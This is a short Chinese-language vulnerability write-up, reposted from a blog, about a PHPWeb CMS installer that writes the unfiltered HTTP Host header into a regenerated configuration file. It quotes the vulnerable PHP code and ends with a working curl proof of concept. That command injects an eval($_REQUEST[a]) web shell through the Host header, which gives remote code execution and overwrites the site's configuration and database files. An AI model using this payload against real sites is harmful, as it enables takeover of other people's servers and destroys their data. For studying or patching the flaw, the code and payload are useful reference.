本文共 1095 字,大约阅读时间需要 3 分钟。
注入:通过
之所以鸡肋就是该漏洞利用安装文件重新生成配置文件并写入可执行代码。鸡肋1:具有破坏性,动作非常大,重新写了配置文件、数据库连接文件。
鸡肋2:有一定安全常识的站长都会删掉install目录。
虽然鸡肋,但也有优点:不受magic_quotes_gpc、webserver影响。
$siteurl = "http://" . $_SERVER["HTTP_HOST"] . "/"; //未过滤$filestr = fread(fopen($SysConfigFile, 'r'), 30000);$filestr = str_replace(" ", "", $filestr);$filestr = str_replace("DefaultDbHost", $dbhost, $filestr);$filestr = str_replace("DefaultDbName", $dbname, $filestr);$filestr = str_replace("DefaultDbUser", $dbuser, $filestr);$filestr = str_replace("DefaultDbPass", $dbpwd, $filestr);$filestr = str_replace("DefaultsLan", "zh_cn", $filestr);$filestr = str_replace("DefaultTablePre", $tablepre, $filestr);$filestr = str_replace("DefaultSiteUrl", $siteurl, $filestr);fwrite(fopen($ConFile, "w"), $filestr, 30000); $_SERVER["HTTP_HOST"]即http头中HOST传递过来的可控且不受magic_quotes_gpc影响。
poc
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
转载自:https://www.cnblogs.com/58top/p/3728626.html